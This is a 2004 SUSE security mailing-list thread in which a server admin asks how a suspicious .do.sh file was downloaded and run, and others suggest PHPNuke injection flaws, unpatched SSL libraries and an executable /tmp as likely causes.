Re: [suse-security] Backdoor over http(s)??
I have got in /cgi-bin/ directory: -neomail (1.26) -openwebmail (2.30) -SuSE things -sanecgi but nothing else. And I have Phpnuke 6.9 (?? PHP ??) ----- Ok, somebody could use wget, but what about the .do.sh --> how was it possible, to execute it? Tibor On Tue, 13 Jan 2004 10:33:27 -0500 (EST), Rick Green wrote
Before you get too involved in analysing the content of the file that was imported to your machine, you may want to close the facility that allowed the download in the first place! What have you got in your cgi-bin directory that allows arbitrary use of wget?
-- Rick Green
"They that can give up essential liberty to obtain a little temporary safety, deserve neither liberty nor safety." -Benjamin Franklin
Hi Mátyás, Am Die, den 13.01.2004 schrieb Mátyás Tibor um 17:33:
I have got in /cgi-bin/ directory:
-neomail (1.26) -openwebmail (2.30) -SuSE things -sanecgi
but nothing else.
And I have Phpnuke 6.9 (?? PHP ??)
Did you check PHPNuke? I wouldn't trust this piece of software further than I can throw my Gateway bigtower case ;-) PostNuke and PHPNuke are known to be notoriously weak when it comes to security.
----- Ok, somebody could use wget, but what about the .do.sh --> how was it possible, to execute it?
Without knowing anything else I'd suspect PHPNuke to be the open door. It may contain a bug that allows to pass executable content as a parameter. This has been the case in the past very often as the developers of those two projects don't seem to be too concerned about evaluating the parameters at runtime. Have a look at this: http://www.gulftech.org/01032004.php or http://www.securitytracker.com/alerts/2003/Dec/1008562.html I really wouldn't use PostNuke or PHPNuke as there never has been any code audit seemingly since new weaknesses based on poor programming are discovered regularly. just my 0.02 euro ;-) Tobias
Mátyás Tibor wrote: First off, there was a "backdoor" during 2003 (dont remember when) in the SSL-libs. Which could be used via Apache to put files in the /tmp dir... (I know this cause I found such files myself)
And I have Phpnuke 6.9 (?? PHP ??)
PHPNuke is ridden with security flaws, 6.9 have had securitypatches for admin.php, the weblinks & downloads modules. Depends on if you patch your server or not...
Ok, somebody could use wget, but what about the .do.sh --> how was it possible, to execute it?
/tmp is a executable directory, isn't it?! Normally "hackers" who gain access through some backdoor needs to gain access to the machine, then try to execute a lot of tests to see if any local exploits are available to see if they can get root-access. My own experience a month back told me so (an old RH 7.0 machine got hacked) //Mattias
participants (3)
-
Mattias Pettersson
-
Mátyás Tibor
-
Tobias Weisserth